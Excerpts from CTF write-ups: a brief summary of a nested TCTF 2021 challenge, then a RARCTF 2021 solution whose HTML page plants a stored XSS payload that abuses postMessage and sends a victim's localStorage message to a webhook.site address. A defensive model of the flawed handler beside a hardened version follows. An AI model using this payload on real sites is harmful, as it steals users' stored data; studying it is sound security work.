This is a crazy nested challenge: we first need to use a side-channel attack
to leak admin_key.txt; then we need to exploit ss_agent to gain the ability to
open and operate on /dev/ss; then we need to exploit ss.ko to get a root
shell; finally we need to exploit qemu to get the flag, which lives outside the guest.

Original writeup
(https://mem2019.github.io/jekyll/update/2021/07/06/TCTF2021-Secure-Storage.html).

Create a malicious page, which registers a user with the following payload in
the username:  
1. Overwrite the body of secureenclave with `<iframe id=frame
src="/secure.js"></iframe><div id=site>https://securestorage.rars.win</div>`.
The additional div is necessary so that the check for site in the onmessage
handler does not fail.  
2. Overwrite the body of the iframe we just created with code that
exfiltrates the flag (the `<img src=x onerror=...>` tag in the final page below).

Final HTML page:  
```html
<html>
<body onload="loginform.submit()">
<form id="loginform" method="POST" action="https://securestorage.rars.win/api/register">
<input type="text" class="form-control" name="user" placeholder="Username"
value='5123<script>setTimeout(() => {
  storage = document.getElementById("secure_storage");
  storage.contentWindow.postMessage(["document.body.innerHTML", `<iframe id=frame src="/secure.js"></iframe><div id=site>https://securestorage.rars.win</div>`], storage.src);
  setTimeout(() => {
    storage.contentWindow.postMessage(["window.frame.contentWindow.document.body.innerHTML", "<img src=x onerror=\"fetch(`https://webhook.site/0334edcb-76bd-414b-9caf-c5f304c121ce/${btoa(localStorage.message)}`)\"/>"], storage.src);
  }, 500);
}, 1000)</script>'>
<input type="password" class="form-control" name="pass" placeholder="Password" value='123123'>
<button type="submit" class="btn btn-primary mt-4">Login</button>
</form>
</body>
</html>
```

Original writeup (https://blog.justins.in/rarctf21/).
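A defensive counterpart, added here and not part of either writeup or of the challenge's own source: a model of the postMessage handler pattern the two steps above rely on (trust decided by reading a `site` string out of the handler's own DOM, which an earlier message was allowed to rewrite, followed by a write to an attacker-chosen property path), beside a hardened handler that checks `event.origin`, which the browser sets and page content cannot alter, and accepts only allowlisted, structured commands. The handler shapes, the `TRUSTED_ORIGIN` constant and the fake document object are assumptions made so the code runs under node; the challenge's real handler is not on the page.

```javascript
// Added example, not the challenge's code. Models the onmessage weakness the
// writeup chains through, beside a hardened version. All names are assumptions.

const TRUSTED_ORIGIN = "https://securestorage.rars.win";

// Minimal stand-in for `document` so the example runs outside a browser.
function makeFakeDocument() {
  const doc = { body: { innerHTML: "" }, elements: {} };
  doc.getElementById = (id) => doc.elements[id] || null;
  return doc;
}

// Weak pattern: the trust decision reads the page's own DOM, and the message
// is [propertyPath, value], so anything reachable from `document` is writable.
// event.origin is never consulted, which is why a hostile parent page that
// first plants a matching "site" div is accepted afterwards.
function weakHandler(doc, event) {
  const site = doc.getElementById("site");
  if (!site || site.textContent !== TRUSTED_ORIGIN) return "rejected";
  const [path, value] = event.data;
  const parts = path.split(".");           // e.g. "document.body.innerHTML"
  let target = doc;
  for (const p of parts.slice(1, -1)) target = target[p]; // parts[0] is "document"
  target[parts[parts.length - 1]] = value; // arbitrary property write
  return "applied";
}

// Hardened pattern: origin from the MessageEvent, structured allowlisted
// commands, and the stored value is treated as plain data (never as HTML or
// as a property path).
const ALLOWED_COMMANDS = new Set(["getMessage", "setMessage"]);

function hardenedHandler(store, event) {
  if (event.origin !== TRUSTED_ORIGIN) return { ok: false, reason: "bad origin" };
  const msg = event.data;
  if (!msg || typeof msg !== "object" || !ALLOWED_COMMANDS.has(msg.cmd)) {
    return { ok: false, reason: "bad command" };
  }
  if (msg.cmd === "setMessage") {
    if (typeof msg.value !== "string") return { ok: false, reason: "bad value" };
    store.message = msg.value;
    return { ok: true };
  }
  return { ok: true, value: store.message };
}

// Constructed scenario: a hostile embedding page has already seeded the DOM
// with a "site" div, then sends a property-path write from its own origin.
function runDemo() {
  const doc = makeFakeDocument();
  doc.elements.site = { textContent: TRUSTED_ORIGIN };
  const hostile = { origin: "https://attacker.example", data: ["document.body.innerHTML", "replaced"] };
  const store = {};
  return {
    weak: weakHandler(doc, hostile),                      // "applied"
    weakBody: doc.body.innerHTML,                         // "replaced"
    hardened: hardenedHandler(store, hostile).reason,     // "bad origin"
  };
}

console.log(runDemo());
```

The `site` div check in the weak handler is satisfied by the very first message, because that message is what creates the div; the hardened handler has no such dependency on mutable page state, and because it never assigns to a path taken from the message, a second-stage write into a child frame's `document.body.innerHTML` is not expressible at all.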